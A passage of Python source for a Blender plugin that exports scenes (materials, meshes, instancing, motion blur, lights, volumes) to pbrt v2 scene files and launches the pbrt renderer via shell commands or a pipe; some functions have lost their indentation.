# exportMaterialLink(self, file, mat)
# exports material link. LuxRender "Material"
#-------------------------------------------------
def exportMaterialLink(self, file, mat):
if mat == dummyMat:
file.write("\tMaterial \"matte\" # dummy material\n")
else:
file.write("\t%s"%exportMaterialGeomTag(mat)) # use original methode
#-------------------------------------------------
# exportMaterial(self, file, mat)
# exports material. LuxRender "Texture"
#-------------------------------------------------
def exportMaterial(self, file, mat):
print("material %s"%(mat.getName()))
file.write("\t%s"%exportMaterial(mat)) # use original methode
#-------------------------------------------------
# exportMaterials(self, file)
# exports materials to the file
#-------------------------------------------------
def exportMaterials(self, file):
for mat in self.materials:
self.exportMaterial(file, mat)
#-------------------------------------------------
# getMeshType(self, vertcount, mat)
# returns type of mesh as string to use depending on thresholds
#-------------------------------------------------
    def getMeshType(self, vertcount, mat):
        """
        Return the pbrt shape-type string for a mesh: "loopsubdiv" with a
        subdivision level when the material requests it, otherwise plain
        "trianglemesh". ``vertcount`` is currently unused (kept for
        interface compatibility).
        """
        scn = Scene.GetCurrent()
        if mat != dummyMat:
            usesubdiv = luxProp(mat, "subdiv", "false")
            # Displacement-map support is currently disabled:
            # usedisp = luxProp(mat, "dispmap", "false")
            # sharpbound = luxProp(mat, "sharpbound", "false")
            # nsmooth = luxProp(mat, "nsmooth", "true")
            # sdoffset = luxProp(mat, "sdoffset", 0.0)
            dstr = ""
            if usesubdiv.get() == "true":
                nlevels = luxProp(mat, "sublevels", 1)
                dstr += "\"loopsubdiv\" \"integer nlevels\" [%i] "% (nlevels.get())
            # if usedisp.get() == "true":
            # dstr += " \"string displacementmap\" [\"%s::dispmap.scale\"] \"float dmscale\" [-1.0] \"float dmoffset\" [%f]"%(mat.getName(), sdoffset.get()) # scale is scaled in texture
            if dstr != "": return dstr
        return "\"trianglemesh\""
#-------------------------------------------------
# exportMeshOpt(self, file, mesh, mats, name, portal, optNormals)
# exports mesh to the file with optimization.
# portal: export without normals and UVs
# optNormals: speed and filesize optimization, flat faces get exported without normals
#-------------------------------------------------
    def exportMeshOpt(self, file, mesh, mats, name, portal=False, optNormals=True):
        """
        Write *mesh* to *file* as pbrt Shape/PortalShape statements,
        deduplicating vertices per (position, normal, uv) tuple.

        portal: export without normals and UVs.
        optNormals: split into two passes -- flat faces without normals,
        smoothed faces with normals -- to shrink the output.
        """
        # Each "shape" pass selects which faces (by smooth flag) and which
        # per-vertex attributes (normals/UVs) are emitted.
        shapeList, smoothFltr, shapeText = [0], [[0,1]], [""]
        if portal:
            # NOTE(review): portals are currently emitted as nothing here --
            # early return skips the whole body. Confirm this is intended.
            return
        else:
            uvFltr, normalFltr, shapeText = [1], [1], ["mixed with normals"] # normals and UVs
            if optNormals: # one pass for flat faces without normals and another pass for smoothed faces with normals, all with UVs
                shapeList, smoothFltr, normalFltr, uvFltr, shapeText = [0,1], [[0],[1]], [0,1], [1,1], ["flat w/o normals", "smoothed with normals"]
        if mats == []:
            mats = [dummyMat]
        usedmats = [f.mat for f in mesh.faces]
        for matIndex in range(len(mats)):
            # Skip material slots no face actually references.
            if not matIndex in usedmats:
                continue
            if not(portal):
                mat = mats[matIndex]
                if not mat:
                    mat = dummyMat
                self.exportMaterialLink(file, mat)
            for shape in shapeList:
                # blenderExportVertexMap[blender_index] -> candidate export
                # indices; used to share identical exported vertices.
                blenderExportVertexMap = []
                exportVerts = []
                exportFaces = []
                ffaces = [f for f in mesh.faces if (f.mat == matIndex) and (f.smooth in smoothFltr[shape])]
                for face in ffaces:
                    exportVIndices = []
                    index = 0
                    for vertex in face:
                        # Build the attribute tuple for this corner:
                        # [position, (normal), (uv)] depending on filters.
                        # v = [vertex.co[0], vertex.co[1], vertex.co[2]]
                        v = [vertex.co]
                        if normalFltr[shape]:
                            if (face.smooth):
                                # v.extend(vertex.no)
                                v.append(vertex.no)
                            else:
                                # v.extend(face.no)
                                v.append(face.no)
                        if (uvFltr[shape]) and (mesh.faceUV):
                            # v.extend(face.uv[index])
                            v.append(face.uv[index])
                        blenderVIndex = vertex.index
                        newExportVIndex = -1
                        length = len(v)
                        # Reuse an already-exported vertex with identical
                        # attributes, if one exists for this blender index.
                        if (blenderVIndex < len(blenderExportVertexMap)):
                            for exportVIndex in blenderExportVertexMap[blenderVIndex]:
                                v2 = exportVerts[exportVIndex]
                                if (length==len(v2)) and (v == v2):
                                    newExportVIndex = exportVIndex
                                    break
                        if (newExportVIndex < 0):
                            # First occurrence: append and index it.
                            newExportVIndex = len(exportVerts)
                            exportVerts.append(v)
                            while blenderVIndex >= len(blenderExportVertexMap):
                                blenderExportVertexMap.append([])
                            blenderExportVertexMap[blenderVIndex].append(newExportVIndex)
                        exportVIndices.append(newExportVIndex)
                        index += 1
                    exportFaces.append(exportVIndices)
                if (len(exportVerts)>0):
                    mesh_str = self.getMeshType(len(exportVerts), mats[matIndex])
                    if (portal):
                        file.write("\tPortalShape %s \"integer indices\" [\n"% mesh_str)
                    else:
                        file.write("\tShape %s \"integer indices\" [\n"% mesh_str)
                    for face in exportFaces:
                        # Quads are split into two triangles.
                        file.write("%d %d %d\n"%(face[0], face[1], face[2]))
                        if (len(face)==4):
                            file.write("%d %d %d\n"%(face[0], face[2], face[3]))
                    file.write("\t] \"point P\" [\n")
                    # for vertex in exportVerts:
                    # file.write("%f %f %f\n"%(vertex[0], vertex[1], vertex[2]))
                    file.write("".join(["%f %f %f\n"%tuple(vertex[0]) for vertex in exportVerts]))
                    if normalFltr[shape]:
                        file.write("\t] \"normal N\" [\n")
                        # for vertex in exportVerts:
                        # file.write("%f %f %f\n"%(vertex[3], vertex[4], vertex[5]))
                        file.write("".join(["%f %f %f\n"%tuple(vertex[1]) for vertex in exportVerts]))
                        if (uvFltr[shape]) and (mesh.faceUV):
                            file.write("\t] \"float uv\" [\n")
                            # for vertex in exportVerts:
                            # file.write("%f %f\n"%(vertex[6], vertex[7]))
                            file.write("".join(["%f %f\n"%tuple(vertex[2]) for vertex in exportVerts]))
                    else:
                        if (uvFltr[shape]) and (mesh.faceUV):
                            file.write("\t] \"float uv\" [\n")
                            # for vertex in exportVerts:
                            # file.write("%f %f\n"%(vertex[3], vertex[4]))
                            file.write("".join(["%f %f\n"%tuple(vertex[1]) for vertex in exportVerts]))
                    file.write("\t]\n")
                    print(" shape(%s): %d vertices, %d faces"%(shapeText[shape], len(exportVerts), len(exportFaces)))
#-------------------------------------------------
# exportMeshes(self, file)
# exports meshes that uses instancing (meshes that are used by at least "instancing_threshold" objects)
#-------------------------------------------------
def exportMeshes(self, file):
scn = Scene.GetCurrent()
instancing_threshold = luxProp(scn, "instancing_threshold", 2).get()
mesh_optimizing = luxProp(scn, "mesh_optimizing", True).get()
mesh = Mesh.New('')
for (mesh_name, objs) in self.meshes.items():
allow_instancing = True
mats = getMaterials(objs[0]) # mats = obj.getData().getMaterials()
for mat in mats: # don't instance if one of the materials is emissive
if (mat!=None) and (luxProp(mat, "type", "").get()=="light"):
allow_instancing = False
for obj in objs: # don't instance if the objects with same mesh uses different materials
ms = getMaterials(obj)
if ms != mats:
allow_instancing = False
if obj.modifiers.__len__() > 0:
allow_instancing = False
if allow_instancing and (len(objs) > instancing_threshold):
del self.meshes[mesh_name]
mesh.getFromObject(objs[0], 0, 1)
print("blender-mesh: %s (%d vertices, %d faces)"%(mesh_name, len(mesh.verts), len(mesh.faces)))
file.write("ObjectBegin \"%s\"\n"%mesh_name)
self.exportMeshOpt(file, mesh, mats, mesh_name)
file.write("ObjectEnd # %s\n\n"%mesh_name)
mesh.verts = None
    #-------------------------------------------------
    # exportObjects(self, file)
    # exports objects to the file
    #-------------------------------------------------
    def exportObjects(self, file):
        """Write every collected object either inline or as an
        ObjectInstance reference to a mesh definition emitted by
        exportMeshes(), optionally wrapped in ActiveTransform blocks for
        object motion blur (sampled one frame ahead).
        """
        scn = Scene.GetCurrent()
        cam = scn.getCurrentCamera().data
        objectmblur = luxProp(cam, "objectmblur", "true")
        usemblur = luxProp(cam, "usemblur", "false")
        # NOTE(review): value fetched for luxProp's property-registration
        # side effect only; it is not read below.
        mesh_optimizing = luxProp(scn, "mesh_optimizing", True).get()
        mesh = Mesh.New('')
        for [obj, matrix] in self.objects:
            print("object: %s"%(obj.getName()))
            mesh_name = obj.getData(name_only=True)
            motion = None
            if(objectmblur.get() == "true" and usemblur.get() == "true"):
                # motion blur: compare against the matrix one frame ahead
                frame = Blender.Get('curframe')
                Blender.Set('curframe', frame+1)
                m1 = 1.0*matrix # multiply by 1.0 to get a copy of original matrix (will be frame-independent)
                Blender.Set('curframe', frame)
                if m1 != matrix:
                    print("  motion blur")
                    motion = m1
            if motion: # motion-blur only works with instances, so ensure mesh is exported as instance first
                if mesh_name in self.meshes:
                    del self.meshes[mesh_name]
                    mesh.getFromObject(obj, 0, 1)
                    mats = getMaterials(obj)
                    print("  blender-mesh: %s (%d vertices, %d faces)"%(mesh_name, len(mesh.verts), len(mesh.faces)))
                    file.write("ObjectBegin \"%s\"\n"%mesh_name)
                    self.exportMeshOpt(file, mesh, mats, mesh_name)
                    file.write("ObjectEnd # %s\n\n"%mesh_name)
            file.write("AttributeBegin # %s\n"%obj.getName())
            if motion:
                file.write("\tActiveTransform StartTime\n")
            file.write("\tTransform [%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s]\n"\
                %(matrix[0][0], matrix[0][1], matrix[0][2], matrix[0][3],\
                matrix[1][0], matrix[1][1], matrix[1][2], matrix[1][3],\
                matrix[2][0], matrix[2][1], matrix[2][2], matrix[2][3],\
                matrix[3][0], matrix[3][1], matrix[3][2], matrix[3][3]))
            if motion:
                # second transform sampled at the end of the shutter interval
                file.write("\tActiveTransform EndTime\n")
                file.write("\t\tTransform [%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s]\n"\
                    %(motion[0][0], motion[0][1], motion[0][2], motion[0][3],\
                    motion[1][0], motion[1][1], motion[1][2], motion[1][3],\
                    motion[2][0], motion[2][1], motion[2][2], motion[2][3],\
                    motion[3][0], motion[3][1], motion[3][2], motion[3][3]))
                file.write("\tActiveTransform All\n")
            if mesh_name in self.meshes:
                # still present in self.meshes => not instanced: emit inline
                mesh.getFromObject(obj, 0, 1)
                mats = getMaterials(obj)
                print("  blender-mesh: %s (%d vertices, %d faces)"%(mesh_name, len(mesh.verts), len(mesh.faces)))
                self.exportMeshOpt(file, mesh, mats, mesh_name)
            else:
                # mesh was defined by exportMeshes(): reference the instance
                print("  instance %s"%(mesh_name))
                file.write("\tObjectInstance \"%s\"\n"%mesh_name)
            file.write("AttributeEnd\n\n")
        mesh.verts = None
    #-------------------------------------------------
    # exportLights(self, file)
    # exports lights to the file
    #-------------------------------------------------
    def exportLights(self, file):
        """Write Lamp/Spot/Area lamps as pbrt LightSource /
        AreaLightSource statements with their world transform.
        Other lamp types are silently skipped."""
        for [obj, matrix] in self.lights:
            ltype = obj.getData(mesh=1).getType() # data
            if (ltype == Lamp.Types["Lamp"]) or (ltype == Lamp.Types["Spot"]) or (ltype == Lamp.Types["Area"]):
                print("light: %s"%(obj.getName()))
                if ltype == Lamp.Types["Area"]:
                    # emission parameters; `link` is reused in the Area block below
                    # NOTE(review): `str` shadows the builtin (legacy style)
                    (str, link) = luxLight("", "", obj, None, 0)
                    file.write(str)
                if ltype == Lamp.Types["Area"]: file.write("AttributeBegin # %s\n"%obj.getName())
                else: file.write("TransformBegin # %s\n"%obj.getName())
                file.write("\tTransform [%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s]\n"\
                    %(matrix[0][0], matrix[0][1], matrix[0][2], matrix[0][3],\
                    matrix[1][0], matrix[1][1], matrix[1][2], matrix[1][3],\
                    matrix[2][0], matrix[2][1], matrix[2][2], matrix[2][3],\
                    matrix[3][0], matrix[3][1], matrix[3][2], matrix[3][3]))
                # NOTE(review): col/energy are fetched but never used below
                col = obj.getData(mesh=1).col # data
                energy = obj.getData(mesh=1).energy # data
                if ltype == Lamp.Types["Lamp"]:
                    # lightgroup = luxProp(obj, "light.lightgroup", "default")
                    (str, link) = luxLamp("", "", obj, None, 0)
                    file.write(str+"LightSource \"point\""+link+"\n")
                if ltype == Lamp.Types["Spot"]:
                    (str, link) = luxSpot("", "", obj, None, 0)
                    file.write(str)
                    proj = luxProp(obj, "light.usetexproj", "false")
                    # if luxProp(Scene.GetCurrent(), "nolg", "false").get()!="true":
                    # lightgroup = luxProp(obj, "light.lightgroup", "default")
                    if(proj.get() == "true"):
                        # texture projection: flip to look down -Z first
                        file.write("Rotate 180 0 1 0\n")
                        file.write("LightSource \"projection\" \"float fov\" [%f]"%(obj.getData(mesh=1).spotSize))
                    else:
                        file.write("LightSource \"spot\" \"point from\" [0 0 0] \"point to\" [0 0 -1] \"float coneangle\" [%f] \"float conedeltaangle\" [%f]"\
                            %(obj.getData(mesh=1).spotSize*0.5, obj.getData(mesh=1).spotSize*0.5*obj.getData(mesh=1).spotBlend)) # data
                    file.write(link+"\n")
                if ltype == Lamp.Types["Area"]:
                    # lightgroup = luxProp(obj, "light.lightgroup", "default")
                    file.write("\tAreaLightSource \"diffuse\"")
                    file.write(link)
                    # file.write(luxLight("", "", obj, None, 0))
                    file.write("\n")
                    areax = obj.getData(mesh=1).getAreaSizeX()
                    # lamps "getAreaShape()" not implemented yet - so we can't detect shape! Using square as default
                    # todo: ideasman42
                    if (True): areay = areax
                    else: areay = obj.getData(mesh=1).getAreaSizeY()
                    file.write('\tShape "trianglemesh" "integer indices" [0 1 2 0 2 3] "point P" [-%(x)f %(y)f 0.0 %(x)f %(y)f 0.0 %(x)f -%(y)f 0.0 -%(x)f -%(y)f 0.0]\n'%{"x":areax/2, "y":areay/2})
                if ltype == Lamp.Types["Area"]: file.write("AttributeEnd # %s\n"%obj.getName())
                else: file.write("TransformEnd # %s\n"%obj.getName())
                file.write("\n")
    #-------------------------------------------------
    # exportVolumes(self, file)
    # exports volumes to the file
    #-------------------------------------------------
    def exportVolumes(self, file):
        """Write a bound-volume block for every object whose first material
        is of type "boundvolume", passing the object-space AABB as p0/p1."""
        for [obj, matrix] in self.volumes:
            print("volume: %s"%(obj.getName()))
            file.write("# Volume: %s\n"%(obj.getName()))
            # trickery to obtain objectspace boundingbox AABB:
            # transform the world-space bound-box corners back into object space
            mat = obj.matrixWorld.copy().invert()
            bb = [vec * mat for vec in obj.getBoundBox()]
            minx = miny = minz = 100000000000000.0
            maxx = maxy = maxz = -100000000000000.0
            for vec in bb:
                if (vec[0] < minx): minx = vec[0]
                if (vec[1] < miny): miny = vec[1]
                if (vec[2] < minz): minz = vec[2]
                if (vec[0] > maxx): maxx = vec[0]
                if (vec[1] > maxy): maxy = vec[1]
                if (vec[2] > maxz): maxz = vec[2]
            file.write("Transform [%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s]\n"\
                %(matrix[0][0], matrix[0][1], matrix[0][2], matrix[0][3],\
                matrix[1][0], matrix[1][1], matrix[1][2], matrix[1][3],\
                matrix[2][0], matrix[2][1], matrix[2][2], matrix[2][3],\
                matrix[3][0], matrix[3][1], matrix[3][2], matrix[3][3]))
            str_opt = (" \"point p0\" [%f %f %f] \"point p1\" [%f %f %f]"%(minx, miny, minz, maxx, maxy, maxz))
            mats = getMaterials(obj)
            if (len(mats)>0) and (mats[0]!=None) and (luxProp(mats[0], "type", "").get()=="boundvolume"):
                mat = mats[0]
                # NOTE(review): `str` shadows the builtin (legacy style)
                (str, link) = luxMaterialBlock("", "", "", mat, None, 0, str_opt)
                file.write("%s"%link)
                file.write("\n\n")
######################################################
# EXPORT
######################################################
def save_lux(filename, unindexedname):
    """Export the current scene to a pbrt scene file, or stream it straight
    into a running pbrt process ("pipe" mode).

    filename -- path of the main .pbrt scene file
    unindexedname -- frame-number-free filename; kept for signature
      compatibility (not read in this function body)

    Returns True on a successful file export; False when the export was
    aborted (no light source) or when a piped render was started, in which
    case the caller must NOT launch the renderer a second time.
    """
    export_total_steps = 12.0
    global meshlist, matnames, lxs_filename, geom_filename, geom_pfilename, mat_filename, mat_pfilename, vol_filename, vol_pfilename, LuxIsGUI
    global render_status_text
    global render_status
    render_status_text = 'Exporting...'
    render_status = True
    print("pbrt export started...\n")
    time1 = Blender.sys.time()
    scn = Scene.GetCurrent()
    # derive the companion file names (-geom/-mat/-vol) from the scene file
    filepath = os.path.dirname(filename)
    filebase = os.path.splitext(os.path.basename(filename))[0]
    lxs_filename = filename
    geom_filename = os.path.join(filepath, filebase + "-geom.pbrt")
    geom_pfilename = filebase + "-geom.pbrt"
    mat_filename = os.path.join(filepath, filebase + "-mat.pbrt")
    mat_pfilename = filebase + "-mat.pbrt"
    vol_filename = os.path.join(filepath, filebase + "-vol.pbrt")
    vol_pfilename = filebase + "-vol.pbrt"
    ### Zuegs: initialization for export class
    export = luxExport(Blender.Scene.GetCurrent())
    # check if a light is present
    envtype = luxProp(scn, "env.type", "infinite").get()
    if envtype == "sunsky":
        print("WARNING: sunsky lights not supported")
    if not(export.analyseScene()) and not(envtype == "infinite") and not((envtype == "sunsky") and (sun != None)):
        # nothing in the scene can emit light: abort the export
        print("ERROR: No light source found")
        Draw.PupMenu("ERROR: No light source found%t|OK%x1")
        render_status_text = ''
        render_status = False
        Blender.Window.QRedrawAll()
        del export
        return False
    if LuxIsGUI: DrawProgressBar(0.0/export_total_steps,'Setting up Scene file')
    # Output back-ends: no-op sink, plain file, or pipe into the renderer.
    class output_proxy():
        load_result = False        # whether a result image should be loaded
        combine_all_output = False # True => everything goes into one stream
        f = None                   # underlying file object (None => no-op)
        def close(self):
            if self.f is not None: self.f.close()
        def write(self, str):  # NOTE(review): parameter shadows builtin str
            if self.f is not None:
                self.f.write(str)
                self.f.flush()
    class file_output(output_proxy):
        # writes the scene to a regular file on disk
        def __init__(self,filename):
            self.f = open(filename, "w")
    from threading import Thread
    class pipe_output(output_proxy, Thread):
        # streams the scene into a pbrt subprocess; close() starts a worker
        # thread that waits for the render and loads the result image
        combine_all_output = True
        def __init__(self, xr,yr, haltspp, filename):
            Thread.__init__(self)
            self.filename = filename
            self.haltspp = haltspp
            self.xr = xr
            self.yr = yr
            bintype = "pbrt"
            self.load_result = True
            print("pipe: using %s" % bintype)
            self.p = get_lux_pipe(scn, 1, bintype)
            self.f = self.p.stdin
        def close(self):
            # export finished: kick off the render-wait thread
            global render_status_text
            global render_status
            render_status = True
            render_status_text = "Rendering ..."
            Blender.Window.QRedrawAll()
            self.start()
        def run(self):
            # wait for the renderer, then turn its stdout into an image
            if self.load_result: self.data = self.p.communicate()[0]
            self.f.close()
            if self.load_result: # self.load_image()
                self.load_data()
            print("LuxRender process finished")
            self.update_status()
        def load_image(self):
            # unused alternative: load the rendered image from disk
            i = Blender.Image.Load(self.filename)
            i.makeCurrent()
            i.reload()
        def load_data(self):
            # interpret the captured stdout bytes as raw RGB rows (bottom-up)
            print("processing %i image bytes" % len(self.data))
            i = Blender.Image.New('pbrt', self.xr, self.yr, 32)
            raw_image = []
            for j in self.data:
                raw_image.append(ord(j))
            del self.data
            bi = 0
            for y in range(self.yr-1, -1, -1):
                for x in range(0, self.xr):
                    i.setPixelI(x,y, raw_image[bi:bi+3]+[0])
                    bi+=3
            i.makeCurrent()
        def update_status(self):
            global render_status_text
            global render_status
            render_status = False
            render_status_text = "Rendering complete"
            render_status_text += ", check Image Editor window"
            Blender.Window.QRedrawAll()
    use_pipe_output = luxProp(scn, "pipe", "false").get() == "true" and luxProp(scn, "run", "true").get() == "true"
    file = output_proxy()  # NOTE(review): local name shadows a builtin
    if luxProp(scn, "lxs", "true").get()=="true" or use_pipe_output:
        ##### Determine/open files
        if use_pipe_output:
            print("using pipe output")
            print("Exporting scene to pipe")
            xr,yr = get_render_resolution(scn)
            file = pipe_output(xr, yr,
                luxProp(scn, "haltspp", 0).get(),
                os.path.join(filepath, filebase + ".png")
            )
        else:
            print("using file output")
            print("Exporting scene to '" + filename + "'...\n")
            file = file_output(filename)
        ##### Write Header ######
        file.write("# pbrt v2.0 Scene File\n")
        file.write("# Exported by pbrtBlend Blender Exporter\n")
        file.write("\n")
        ##### Write camera ######
        camObj = scn.getCurrentCamera()
        if LuxIsGUI: DrawProgressBar(1.0/export_total_steps,'Exporting Camera')
        if camObj:
            print("processing Camera...")
            cam = camObj.data
            cammblur = luxProp(cam, "cammblur", "true")
            usemblur = luxProp(cam, "usemblur", "false")
            matrix = camObj.getMatrix()
            motion = None
            file.write("Scale -1 1 1 # account for fixed lookat bug...\n")
            if(cammblur.get() == "true" and usemblur.get() == "true"):
                # camera motion blur: sample the matrix one frame ahead
                frame = Blender.Get('curframe')
                Blender.Set('curframe', frame+1)
                m1 = 1.0*matrix # multiply by 1.0 to get a copy of original matrix (will be frame-independant)
                Blender.Set('curframe', frame)
                if m1 != matrix:
                    # Motion detected, write endtransform
                    print("  motion blur")
                    motion = m1
                    pos = m1[3]
                    forwards = -m1[2]
                    target = pos + forwards
                    up = m1[1]
                    file.write("TransformBegin\n")
                    file.write(" ActiveTransform EndTime\n")
                    file.write(" LookAt %f %f %f \n %f %f %f \n %f %f %f\n" % ( pos[0], pos[1], pos[2], target[0], target[1], target[2], up[0], up[1], up[2] ))
                    file.write("TransformEnd\n\n")
            # Write original lookat transform
            pos = matrix[3]
            forwards = -matrix[2]
            target = pos + forwards
            up = matrix[1]
            if motion:
                file.write("ActiveTransform StartTime\n")
            file.write("LookAt %f %f %f \n %f %f %f \n %f %f %f\n\n" % ( pos[0], pos[1], pos[2], target[0], target[1], target[2], up[0], up[1], up[2] ))
            file.write(luxCamera(camObj.data, scn.getRenderingContext()))
            if motion:
                file.write("\nActiveTransform All\n")
            file.write("\n")
        file.write("\n")
        if LuxIsGUI: DrawProgressBar(2.0/export_total_steps,'Exporting Film Settings')
        ##### Write film ######
        file.write(luxFilm(scn))
        file.write("\n")
        if LuxIsGUI: DrawProgressBar(3.0/export_total_steps,'Exporting Pixel Filter')
        ##### Write Pixel Filter ######
        file.write(luxPixelFilter(scn))
        file.write("\n")
        if LuxIsGUI: DrawProgressBar(4.0/export_total_steps,'Exporting Sampler')
        ##### Write Sampler ######
        file.write(luxSampler(scn))
        file.write("\n")
        if LuxIsGUI: DrawProgressBar(5.0/export_total_steps,'Exporting Surface Integrator')
        ##### Write Surface Integrator ######
        file.write(luxSurfaceIntegrator(scn))
        file.write("\n")
        if LuxIsGUI: DrawProgressBar(6.0/export_total_steps,'Exporting Volume Integrator')
        ##### Write Volume Integrator ######
        file.write(luxVolumeIntegrator(scn))
        file.write("\n")
        # NOTE(review): progress step 6.0 repeated below; 7.0 is skipped
        if LuxIsGUI: DrawProgressBar(6.0/export_total_steps,'Exporting Renderer')
        ##### Write Renderer (maybe) ######
        file.write(luxRenderer(scn))
        file.write("\n")
        ########## BEGIN World
        file.write("\n")
        file.write("WorldBegin\n")
        file.write("\n")
        ########## World scale
        #scale = luxProp(scn, "global.scale", 1.0).get()
        #if scale != 1.0:
        #	# TODO: not working yet !!!
        #	# TODO: propabily scale needs to be applyed on camera coords too
        #	file.write("Transform [%s 0.0 0.0 0.0 0.0 %s 0.0 0.0 0.0 0.0 %s 0.0 0.0 0.0 0 1.0]\n"%(scale, scale, scale))
        #	file.write("\n")
        if LuxIsGUI: DrawProgressBar(8.0/export_total_steps,'Exporting Environment')
        ##### Write World Background, Sunsky or Env map ######
        env = luxEnvironment(scn)
        if env != "":
            file.write("AttributeBegin\n")
            file.write(env)
            file.write("AttributeEnd\n")
            file.write("\n")
        #### Write material & geometry file includes in scene file
        # (piped output keeps everything in one stream, so no includes then)
        if not file.combine_all_output: file.write("Include \"%s\"\n\n" %(mat_pfilename))
        if not file.combine_all_output: file.write("Include \"%s\"\n\n" %(geom_pfilename))
        if not file.combine_all_output: file.write("Include \"%s\"\n\n" %(vol_pfilename))
    if luxProp(scn, "lxm", "true").get()=="true" or use_pipe_output:
        if LuxIsGUI: DrawProgressBar(9.0/export_total_steps,'Exporting Materials')
        ##### Write Material file #####
        if not file.combine_all_output: print("Exporting materials to '" + mat_filename + "'...\n")
        mat_file = open(mat_filename, 'w') if not file.combine_all_output else file
        mat_file.write("")
        export.exportMaterials(mat_file)
        mat_file.write("")
        if not file.combine_all_output: mat_file.close()
    if luxProp(scn, "lxo", "true").get()=="true" or use_pipe_output:
        if LuxIsGUI: DrawProgressBar(10.0/export_total_steps,'Exporting Geometry')
        ##### Write Geometry file #####
        if not file.combine_all_output: print("Exporting geometry to '" + geom_filename + "'...\n")
        geom_file = open(geom_filename, 'w') if not file.combine_all_output else file
        meshlist = []
        geom_file.write("")
        export.exportLights(geom_file)
        export.exportMeshes(geom_file)
        export.exportObjects(geom_file)
        geom_file.write("")
        if not file.combine_all_output: geom_file.close()
    if luxProp(scn, "lxv", "true").get()=="true" or use_pipe_output:
        if LuxIsGUI: DrawProgressBar(11.0/export_total_steps,'Exporting Volumes')
        ##### Write Volume file #####
        if not file.combine_all_output: print("Exporting volumes to '" + vol_filename + "'...\n")
        vol_file = open(vol_filename, 'w') if not file.combine_all_output else file
        meshlist = []
        vol_file.write("")
        export.exportVolumes(vol_file)
        vol_file.write("")
        if not file.combine_all_output: vol_file.close()
    render_status_text = ''
    render_status = False
    Blender.Window.QRedrawAll()
    if luxProp(scn, "lxs", "true").get()=="true" or use_pipe_output:
        #### Write End Tag
        file.write("WorldEnd\n\n")
        file.close()  # for pipe output this starts the render-wait thread
    if LuxIsGUI: DrawProgressBar(12.0/export_total_steps,'Export Finished')
    print("Finished.\n")
    del export
    time2 = Blender.sys.time()
    print("Processing time: %f\n" %(time2-time1))
    if use_pipe_output:
        #if luxProp(scn, "haltspp", 0).get() > 0:
        # Wait for piped luxconsole render thread to end
        file.join()
        # Don't launch it again as a piped scene is started implicitly
        return False
    return True
#########################################################################
### LAUNCH LuxRender AND RENDER CURRENT SCENE
#########################################################################
def get_lux_exec(scn, type="luxrender"):
    """Return the full path of the pbrt executable.

    The directory is taken from the scene's "pbrt" property; *type* is
    accepted for call-signature compatibility, but the binary name is
    always "pbrt" (plus ".exe" on Windows).
    """
    ic = luxProp(scn, "pbrt", "").get()
    ic = Blender.sys.dirname(ic) + os.sep + "pbrt"
    if osys.platform == "win32": ic = ic + ".exe"
    # if osys.platform == "darwin": ic = ic + ".app/Contents/MacOS/luxrender"
    return ic
def get_lux_args(filename, extra_args=None, anim=False):
    """Assemble the shell command used to launch pbrt.

    filename -- scene file path, or '-' to feed the scene via stdin
    extra_args -- optional list of extra binary flags
    anim -- pick the console binary and a blocking launch style

    Returns (cmd, raw_args): cmd is the full, platform-specific shell
    command ("start ..." on Windows, "nice"-wrapped elsewhere) and
    raw_args is just the argument string after the executable.
    Implicitly returns None when the configured binary is missing
    (legacy behaviour -- callers unpacking the tuple will then raise).
    """
    if extra_args is None:  # avoid the shared-mutable-default pitfall
        extra_args = []
    ostype = osys.platform
    scn = Scene.GetCurrent()
    ic = get_lux_exec(scn, type=('luxconsole' if anim else 'luxrender'))
    checkluxpath = luxProp(scn, "checkluxpath", True).get()
    if checkluxpath:
        if sys.exists(ic) != 1:
            Draw.PupMenu("Error: Lux renderer not found. Please set path on System page.%t|OK")
            return
    lux_args = "\"%s\" " % ic
    lux_args2 = ' '.join(extra_args)
    if filename == '-':
        lux_args2 = " - " + lux_args2
    else:
        filename = "\"%s\"" % filename
        # FIX: keep a space between the joined flags and the quoted
        # filename; plain concatenation produced e.g. '-b"scene.pbrt"'
        if lux_args2:
            lux_args2 = lux_args2 + " " + filename
        else:
            lux_args2 = filename
    lux_args += lux_args2
    if ostype == "win32":
        # map the unix nice level onto Windows "start" priority classes
        if luxnice > 15: prio = "/low"
        elif luxnice > 5: prio = "/belownormal"
        elif luxnice > -5: prio = "/normal"
        elif luxnice > -15: prio = "/abovenormal"
        else: prio = "/high"
        if not anim:
            cmd = "start /b %s \"\" %s" % (prio, lux_args)
        else:
            cmd = "start /WAIT %s \"\" %s" % (prio, lux_args)
    # if ostype == "linux2" or ostype == "darwin":
    else:
        if not anim:
            cmd = "(nice -n %d %s)&"%(luxnice, lux_args)
        else:
            cmd = "(nice -n %d %s)"%(luxnice, lux_args)
    return cmd, lux_args2
def get_lux_pipe(scn, buf = 1024, type="luxconsole"):
    """Start the pbrt binary as a subprocess with piped stdin/stdout/stderr.

    The scene is later streamed into the returned process's stdin;
    "luxconsole" mode additionally passes the binary-output flag.
    """
    bin = "\"%s\"" % get_lux_exec(scn, type)
    print("piping to pbrt binary: " + bin)
    flags = ['-b'] if type == "luxconsole" else []
    _cmd, raw_args = get_lux_args('-', extra_args=flags)
    pipe = subprocess.PIPE
    return subprocess.Popen(
        bin + raw_args,
        shell=True,
        bufsize=buf,
        stdin=pipe,
        stdout=pipe,
        stderr=pipe,
    )
def launchLux(filename):
    """Launch pbrt on *filename* in the background (does not wait)."""
    command, _raw_args = get_lux_args(filename, extra_args=[])
    print("Running pbrt:\n" + command)
    os.system(command)
def launchLuxWait(filename, anim=False):
    """Launch pbrt on *filename* and block until the render terminates."""
    command, _raw_args = get_lux_args(filename, extra_args=[], anim=anim)
    if osys.platform == "win32":
        # the generated "start /WAIT ..." command already blocks
        os.system(command)
    # if ostype == "linux2" or ostype == "darwin":
    else:
        # unix-likes: run through the shell and wait for completion
        subprocess.call(command, shell=True)
#### SAVE ANIMATION ####
#def save_anim(filename):
# global LuxIsGUI
# scn = Scene.GetCurrent()
# to = luxProp(scn, 'export.threaded', 'true').get()
# run = luxProp(scn, "run", "true").get()
# deflt = luxProp(scn, "default", "true").get()
# if to == 'true' and run == 'true' and deflt == 'false':
# import threading
# anim_thread = threading.Thread(target=save_anim_real, args=(filename,True))
# anim_thread.start()
# else:
# save_anim_real(filename)
def save_anim(filename, as_thread=False):
    """Export (and optionally render) every frame of the animation range.

    Each frame between the scene's start and end frame is exported to a
